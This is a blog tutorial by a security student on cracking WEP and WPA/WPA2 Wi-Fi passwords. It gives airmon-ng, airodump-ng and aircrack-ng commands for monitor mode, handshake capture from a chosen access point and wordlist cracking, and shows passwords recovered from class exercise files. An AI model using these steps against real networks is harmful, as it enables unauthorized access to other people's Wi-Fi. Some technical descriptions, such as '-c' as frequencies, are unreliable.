WEP, WPA/WPA2 Wi-Fi Cracking

Hello Readers

I am Abdul Saajid Shaik currently studying Masters Certificate in Cyber Security by HackerU, this is my first blog and I want to share my knowledge about WiFi hacking and common WEP, WPA/WPA2 attacks and how to crack any WEP, WPA/WPA2 Wi-Fi considering you have the captured handshake file and cracking the captured file for the password.

PS: Don’t Do Shady Work, this is only for ones education purpose and how one can keep WiFi safe from getting password cracked.

Now let’s have some fun without any delay and get our hands dirty.

Link to download KALI Operating System: https://www.kali.org/downloads/

Link to WiFi adapter i am using for the attack: https://zsecurity.org/product/zsecurity-dual-band-usb-wireless-adapter-2-4-5-ghz-realtek-rtl8812au/

There are many other adapters available in the market!

Firstly what all we need is to Setup our WiFi adapter and open Kali Terminal and to verify if the adapter is setup or not with the few commands.

Let’s Start the Process

Connect your WiFi adapter and enter the following commands

If you are using the WiFi adapter for the first time enter the following or proceed from Step 3

1)sudo apt-get install realtek-rtl88xxau-dkms // To install required drivers
2)reboot // To restart the machine
3)iwconfig // To check Devices
4)ifconfig wlan0 down // To down the wlan0 connection
5)airmon-ng check kill // To kill any process if running
6)iwconfig wlan0 mode monitor // To Change Mode from Managed to Monitor such that we can capture the traffic
7)ifconfig wlan0 up // To up the wlan0 connection 
8)airmon-ng start wlan0 // To check the status of the adapter
9)airodump-ng wlan0 // To Scan near by WiFi around you

Adapter Check and Scanning of WiFi networks.

Description

BSSID means MAC address of Access Point.

PWR means the intensity of the signal.

Beacons means no of Announcement Packet’s send by Access Point.

Data means no of captured packets.

#/s means no of data packets per second over interval of 10 secs.

MB means maximum speed supported by Access Point.

ENC means encryption used.

CIPHER means cipher detected by the Adapter.

AUTH means the Authentication protocol in use.

ESSID states the name of Wi-Fi network.

After understanding what every field is, now we can go ahead with our attack .We need a target among these networks which we want to attack specifically and crack. We will now attack this specific network and try to get a WPA handshake.

airodump-ng wlan0 --bssid 04:XX:XX:XX:XX:31 -c 4 --write wifi.cap

Description

-- bssid MAC address of the access point

-c Uses these frequencies in MHz to hop

--write Dump file prefix

wifi.cap file where the handshake is being saved

Now we can use the captured handshake file which is wifi.cap-01.cap to crack password.

Now we can use the created handshake file to Crack the WPA Handshake and get the password. To crack the WPA handshake we will use another utility named aircrack-ng.

aircrack-ng -w wordlist.txt wifi.cap-01.cap

Description

-w to mention that we are using a wordfile containing passwords

wordlist.txt is the wordlist with passwords we use to crack the handshake file.

wifi.cap-01.cap is the main capture file to crack.

Below i will be using few already available captured handshake files Shared in my class as hacking some individual WiFi is a Crime.

WEP Password Cracking:-

aircrack-ng {captured_handshake_file}

aircrack-ng wep_exercise5–01.cap

Cracking hash file of WEP Password WiFi Network

Here we use Brute-force attack and if it is successful we get the password and we were able to successfully crack the password which is namejamesbond .

The time will vary on the key complexity, you need to wait and watch.

WPA/WPA2 Password Cracking:-

aircrack-ng -w {word_list} {captured_handshake_file}

aircrack-ng -w myowndict.txt wpa_exercise1–01.cap

Cracking hash file of WPA Password WiFi Network

In the above example we have used the wordlist named myowndict.txt to crack the password for the cap file named wpa_exercise1–01.cap and we use Brute-force attack and if it is successful we get the password. We were able to successfully crack the password which is HappyMan .

The time will vary on the key complexity, you need to wait and watch.

This is the simple process of Cracking Passwords of WiFi.

We have different security protocols available:-

List of the Security Protocols(ordered from most secure to least secure):

1. WPA3

2. WPA2 Enterprise

3. WPA2 Personal

4. WEP

5. Open Network (no security implemented).

Comparing different WiFi security protocols.

For detailed information of the security protocols you can use the link to understand which type of security is available and which is the best https://www.netspotapp.com/wifi-encryption-and-security.html

It is not necessary that every WiFi can be cracked, different complicity passwords take different time to be cracked.

Here is a table which shows time that may take to crack a password depending on the complexity and the hardware we using to crack.

Source: https://asecuritysite.com/encryption/passes

Hope this blog helps you in understanding and successfully cracking WiFi password and how one can keep WiFi password safe by increasing complexity.

Happy Hacking!

Any Questions or Suggestions feel free to reach-out!